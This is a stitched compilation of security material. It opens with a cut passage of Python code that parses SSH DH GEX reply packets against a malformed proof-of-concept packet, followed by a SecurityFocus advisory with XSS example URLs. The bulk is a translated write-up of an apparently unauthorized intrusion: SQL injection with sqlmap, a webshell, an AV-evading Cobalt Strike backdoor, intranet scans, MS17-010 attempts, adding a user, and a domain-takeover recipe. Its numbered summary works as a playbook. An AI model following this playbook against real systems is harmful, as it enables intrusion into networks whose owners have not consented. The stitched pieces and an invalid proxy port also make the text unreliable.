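        n = self.uint32()
        if n > MAX_STRING:
            raise MalformedPacket("string length %d exceeds cap" % n)
        return self.take(n)

    mpint = string  # same wire encoding (uint32 length + bytes); the value is not needed here


def parse_binary_packet(data):
    """RFC 4253 s6 framing for the unencrypted KEX phase: uint32 packet_length,
    byte padding_length, payload, padding.  Returns the payload."""
    r = Reader(data)
    packet_length = r.uint32()
    if packet_length < 5 or packet_length > MAX_PACKET:
        raise MalformedPacket("packet_length %d out of range" % packet_length)
    body = r.take(packet_length)          # fails if the peer sent fewer bytes than claimed
    padding_length = body[0]
    if padding_length < 4 or padding_length >= packet_length:
        raise MalformedPacket("padding_length %d invalid" % padding_length)
    return body[1:packet_length - padding_length]


def parse_kex_dh_gex_reply(payload):
    """SSH_MSG_KEX_DH_GEX_REPLY (RFC 4419): byte 33, string K_S, mpint f, string signature."""
    r = Reader(payload)
    if r.byte() != SSH_MSG_KEX_DH_GEX_REPLY:
        raise MalformedPacket("not a DH GEX reply")
    host_key, f, sig = r.string(), r.mpint(), r.string()
    if r.remaining():
        raise MalformedPacket("%d trailing bytes" % r.remaining())
    return {"host_key": host_key, "f": f, "signature": sig}


def ssh_string(b):
    return struct.pack(">I", len(b)) + b


def build_gex_reply(host_key, f, signature):
    return bytes([SSH_MSG_KEX_DH_GEX_REPLY]) + ssh_string(host_key) + ssh_string(f) + ssh_string(signature)


def build_packet(payload):
    """Frame a payload with the minimum legal padding (>= 4 bytes, total a multiple of 8)."""
    pad = 8 - ((5 + len(payload)) % 8)
    if pad < 4:
        pad += 8
    return struct.pack(">IB", 1 + len(payload) + pad, pad) + payload + b"\x00" * pad


def check(packet):
    """None if the packet parses as a well-formed DH GEX reply, else the rejection reason."""
    try:
        parse_kex_dh_gex_reply(parse_binary_packet(packet))
        return None
    except MalformedPacket as exc:
        return str(exc)


# The server reply from the PoC above, byte for byte: packet_length 0x23c, padding 9,
# message 0x21, host-key length 0xffff, then 600 bytes of 'A'.
POC_PACKET = b"\x00\x00\x02\x3c" + b"\x09" + b"\x21" + b"\x00\x00\xff\xff" + b"A" * 600
```

The framing layer already trims the PoC to a 562-byte payload (572 minus the length byte and 9 bytes of padding); the host-key read then asks for 65535 bytes when 557 remain, which is the check a vulnerable reader skips.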
24. source: https://www.securityfocus.com/bid/53641/info

The AZ Photo Album is prone to cross-site-scripting and arbitrary-file-upload vulnerabilities because it fails to properly sanitize user-supplied input.

Attackers can exploit these issues to steal cookie information, execute arbitrary client-side script code in the context of the browser, upload and execute arbitrary files in the context of the webserver, and launch other attacks.

http://www.example.com/demo/php-photo-album-script/index.php/%F6%22%20onmouseover=document.write%28%22google.com%22%29%20

http://www.example.com/demo/php-photo-album-script/index.php/?gazpart=suggest
25. 0x01 Finding the injection point

The story starts because I was too idle and was slacking off at work.
While poking around, I hit the query box on a certain website.
Then the old habit kicked in and I entered a query.
Next I entered 1'
Tsk tsk, this is obviously SQL injection.
I decisively pulled out the sqlmap artifact.
The ending was perfect: not only injection, but DBA privileges too.

0x02 Getting a shell on the website

There are a few common ways to get a shell through SQL injection. One is to dump the data, find the site's admin backend with a directory scan, get into the backend and find a way to get a shell through file upload; the other is to learn the site's absolute path from error messages, a phpinfo page, the 404 page and so on. For MySQL, though, the conditions are still somewhat demanding.
So I pulled out Yujian and started scanning the website directory.
I clicked admin on a whim.
I went in and there was actually directory listing.
Then I clicked 00/
A mouthful of old blood sprayed out. Is this over before it even started?
The absolute path came uninvited, and it is actually the most common path. I already knew it; normally you would just run --os-shell against a common path. With tears in my eyes I fed sqlmap the absolute path directly with --os-shell.
There is a point to understand here. For a MySQL database, sqlmap's --os-shell first writes a file: it uploads a file-upload shell tmpXXXX.php, uses that upload shell to upload a command-execution shell tmpXXXX.php, and then runs commands through the command shell.
For details you can go to rain99's blog and learn: https://www.cnblogs.com/rain99-/p/13755496.html
So here I used the upload shell that sqlmap had placed to upload a shell directly.
There was another problem here: the one-line trojan cannot use the assert function.
In the end I changed the trojan and got the shell successfully.
The process of getting the shell had been so smooth that I did not look at the directory listing carefully. While writing this article, though, I looked at the listing carefully and found an unauthenticated upload point. In other words, with unauthenticated upload + directory listing you can find the file upload folder and get a shell.

0x03 Preliminary information gathering

Now that we have a shell, the first step is information gathering.
From the above we can see that the current user is system, the server is Server 2012 with an intranet environment, and the AV ESET NOD32 is installed.
Next let's look at the live hosts on the intranet.
There are many ways to detect live hosts on the intranet: nbtscan, the ICMP protocol, ARP scanning, scanline and so on. Here, for convenience, I bring the host online (to CS) before doing anything else.
The shellcode goes online fully undetected.
Here I use k8gege's Ladon plugin to scan the intranet; its scan results are nicer to look at.
Here are some of the scan results.
We can see there are many live hosts on the intranet. This web server has no domain environment, but the scan results contain sensitive words such as AD, so there are estimated to be at least two domain environments on the intranet. At this point detailed information gathering is needed and an intranet topology diagram is drawn.

0x04 Lateral movement and further information gathering

The first wave on the intranet is MS17-010. Here I also use k8gege's Ladon.
We can see there really are several machines on the intranet that may have MS17-010. Trying them one by one here wastes time, mainly because of the uncertainty. Since that web server has AV installed and the intranet surely has AV too, we target the servers that may be hosts in a domain.
Then CS starts a socks proxy, MSF's proxy is set up, and the fight begins.
Hanging a proxy on the local Kali virtual machine is also very simple:
sudo vim /etc/proxychains.conf
Insert a line with CS's IP and the opened port at the bottom.
Save, then start MSF with proxychains msfconsole
Then something went wrong when the exp hit the target machine. The AV on the machine must have intercepted the interactive execution. So I found an exp that can only run one command at a time and added a user.
Since the last time I looked at this box a month ago, I had not successfully reproduced 17010 while writing this article. Because I had added an account on the target machine earlier, I logged in to have a look and found that the server had been hit with ransomware by some unknown big hacker.
So the rest of the reproduction did not continue, and I did not keep looking at this intranet afterwards.

Let's talk about the general approach to domain environment penetration:
First determine whether the target machine is in a domain environment. If it is,
first bring it online, escalate privileges and read hashes, check whether a domain admin account can be read or whether a domain admin process exists, inject into that process, then pass the hash to take domain control, and dump all the hashes in the domain.
If the above does not work, you can also try common domain privilege escalations such as MS14-068, MS14-025 and CVE-2020-1472.
If that does not work either, scan the web applications or common devices in the domain, start from a device vulnerability or a web vulnerability, and take the domain controller step by step.
One thing to note is that throughout the intranet penetration the goal must be clear, otherwise a lot of time is wasted. At the same time your thinking should be flexible and adaptable; don't cling to a single point.

0x03 Summary

1. Enter 1' into the target site's query and an SQL error is shown; there may be SQL injection.
2. Save the query's packet capture from BP as data.txt and inject with sqlmap -r data.txt; there is an injection vulnerability and the database privilege is DBA.
3. Use the Yujian directory scanning tool to scan the target site's directories and find that the admin directory returns HTTP 200.
4. Freely access folders under the admin directory, e.g. 00/ reports an error, and the error displays the site's physical path.
5. Write a one-liner via sqlmap's --os-shell parameter.
6. Connect to the one-liner with AntSword. Checking the directory, find there is an unauthenticated upload point at /js/jqery_file_upload/. Through this upload point you can upload a trojan and find the uploaded file's path via directory listing.
7. Through AntSword's virtual command terminal, query the IP address, system processes (whether there is AV), system information and patch information: ipconfig -- 192.168.1.34 (the target site's intranet IP); tasklist /svc ---- EKM.EXE and EGUIPROXY.EXE (ESET NOD32 AV); systeminfo.
8. Run Cobalt Strike on the VPS, generate a PS backdoor and make it AV-evading (PowerShell is recommended for evasion). Upload the PS script to the target site server via AntSword and execute it; it goes online successfully.
9. Upload Ladon.exe in CS and scan system versions with Ladon 192.168.1.0/24 OsScan.
10. Also scan for the EternalBlue vulnerability with Ladon 192.168.1.0/24 MS17-010 and find multiple hosts have it. On the local Kali, add a socks5 proxy with the following config file: vim /etc/proxychains.conf, socks4 <target IP>:223313. Since NOD32 is installed on the internet-facing web server, there should be other network segments. Try MS17-010; no success.

Source: https://xz.aliyun.com/t/8586